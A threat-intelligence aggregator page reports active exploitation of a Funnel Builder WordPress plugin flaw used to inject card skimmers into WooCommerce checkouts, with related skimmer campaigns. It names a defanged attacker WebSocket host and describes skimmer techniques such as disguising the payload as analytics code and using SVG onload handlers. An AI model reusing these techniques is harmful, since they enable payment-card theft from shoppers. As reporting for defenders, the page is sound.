Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Funnel Builder plugin WordPress arbitrary JavaScript injection actively exploited security flaw

Vulnerability
First reported
Last updated
Happening score
H score 48
1 unique sources, 1 articles

Summary

Hide ▲

Funnel Builder for WordPress is under active exploitation for arbitrary JavaScript injection into WooCommerce checkout pages, creating payment-skimming risk across more than 40,000 stores. The flaw affects all versions before 3.15.0.3, and FunnelKit has released a fix. Attackers are abusing a publicly exposed checkout endpoint and weak method restrictions to write attacker-controlled data into plugin settings. The injected code can steal credit card numbers, CVVs, and billing addresses from shoppers at checkout.

Related Happenings

Funnel Builder WordPress plugin unauthenticated checkout script injection actively exploited security flaw

Vulnerability
First: 15.05.2026 22:30 Last: 15.05.2026 22:30 Sources 1

About this happening: **Funnel Builder** for WordPress has an **actively exploited** unauthenticated script-injection flaw that can compromise **WooCommerce checkout pages** and steal payment data. The...

Open Happening

Burst Statistics authentication bypass (CVE-2026-8181)

Vulnerability
First: 15.05.2026 00:07 Last: 15.05.2026 00:07 Sources 1

About this happening: **Burst Statistics** on **WordPress sites** is facing active exploitation of **CVE-2026-8181**, a critical **authentication bypass** that can let unauthenticated attackers imperso...

Open Happening

Magento checkout skimmer campaign targeting nearly 100 stores

Campaign
First: 09.04.2026 01:34 Last: 09.04.2026 01:34 Sources 1

About this happening: A **Magento** checkout skimmer campaign is compromising **nearly 100 online stores** and stealing payment data at the point of sale, putting shoppers’ card details at immediate ri...

Open Happening

WebRTC payment skimmer

Malware Activity
First: 26.03.2026 08:53 Last: 26.03.2026 08:53 Sources 1

About this happening: A **new payment skimmer** has been identified using **WebRTC data channels** to load payloads and steal payment data from **e-commerce sites**, bypassing common security controls....

Open Happening

Magento Open Source v2 and Adobe Commerce PolyShell mass exploitation

Exploitation Wave
First: 25.03.2026 23:40 Last: 25.03.2026 23:40 Sources 1

About this happening: **PolyShell** exploitation is now underway against **Magento Open Source v2** and **Adobe Commerce**, with attackers reaching **56.7%** of vulnerable stores. The surge began on **...

Latest development: 09.04.2026 01:34

Sansec reported a new campaign against nearly 100 Magento online stores in which attackers hide a credit card skimmer inside a 1x1-pixel SVG element with an onload handler, display a fake Secure Checkout overlay on checkout, validate submitted card data with Luhn, and exfiltrate payment details to attacker infrastructure; the researchers also identified six exfiltration domains hosted by IncogNet LLC (AS40663).

Open Happening

Timeline

  1. 16.05.2026 18:20 2 articles · 11d ago

    Funnel Builder checkout skimming disclosure

    Initial Disclosure

    A critical Funnel Builder vulnerability in WordPress is under active exploitation against WooCommerce checkout pages, where attackers inject malicious JavaScript through a publicly exposed checkout endpoint or the plugin's "External Scripts" setting to steal payment data at checkout. The payload can masquerade as Google Tag Manager or Google Analytics code, load a remote JavaScript skimmer, and open a WebSocket connection to wss://protect-wss[.]com/ws to retrieve a storefront-specific skimmer. The issue affects all versions before 3.15.0.3, Funnel Builder is used in more than 40,000 WooCommerce stores, and FunnelKit has released version 3.15.0.3 as a patch.

    Show sources
    Open in new tab